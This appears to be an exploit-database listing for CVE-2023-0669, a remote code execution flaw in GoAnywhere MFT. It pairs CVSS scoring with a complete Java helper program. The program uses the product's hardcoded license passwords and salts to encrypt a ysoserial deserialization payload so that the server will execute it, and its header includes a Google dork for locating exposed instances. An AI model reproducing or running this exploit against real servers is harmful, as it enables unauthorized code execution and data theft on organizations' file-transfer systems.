Goanywhere Encryption Helper 7.1.1 Remote Code Execution

2023-04-1000:00:00

Youssef Muhammad

packetstormsecurity.com

149

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

JSON

`// Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)  
// Google Dork: title:"GoAnywhere"   
// Date: 3/26/2023  
// Exploit Author: Youssef Muhammad  
// Vendor Homepage: https://www.goanywhere.com/  
// Software Link: https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0  
// Version: > 7.1.1 for windows / > 7.0.3 for Linux   
// Tested on: Windows, Linux  
// CVE : CVE-2023-0669  
// This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution   
  
import java.util.Base64;  
import javax.crypto.Cipher;  
import java.nio.charset.StandardCharsets;  
import javax.crypto.SecretKeyFactory;  
import javax.crypto.spec.PBEKeySpec;  
import javax.crypto.spec.IvParameterSpec;  
import javax.crypto.spec.SecretKeySpec;  
import java.nio.file.Files;  
import java.nio.file.Paths;  
public class CVE_2023_0669_helper {  
static String ALGORITHM = "AES/CBC/PKCS5Padding";  
static byte[] KEY = new byte[30];  
static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);  
public static void main(String[] args) throws Exception {  
if (args.length != 2) {  
System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>");  
System.exit(1);  
}  
String filePath = args[0];  
String version = args[1];  
byte[] fileContent = Files.readAllBytes(Paths.get(filePath));  
String encryptedContent = encrypt(fileContent, version);  
System.out.println(encryptedContent);  
}  
public static String encrypt(byte[] data, String version) throws Exception {  
Cipher cipher = Cipher.getInstance(ALGORITHM);  
KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue();  
SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES");  
IvParameterSpec ivSpec = new IvParameterSpec(IV);  
cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);  
byte[] encryptedObject = cipher.doFinal(data);  
String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject);  
String v = (version.equals("2")) ? "$2" : "";  
bundle += v;  
return bundle;  
}  
private static byte[] getInitializationValue() throws Exception {  
// Version 1 Encryption  
String param1 = "go@nywhereLicenseP@$$wrd";  
byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85};  
return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded();  
}  
private static byte[] getInitializationValueV2() throws Exception {  
// Version 2 Encryption  
String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R";  
byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};  
return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded();  
}  
}  
  
  
`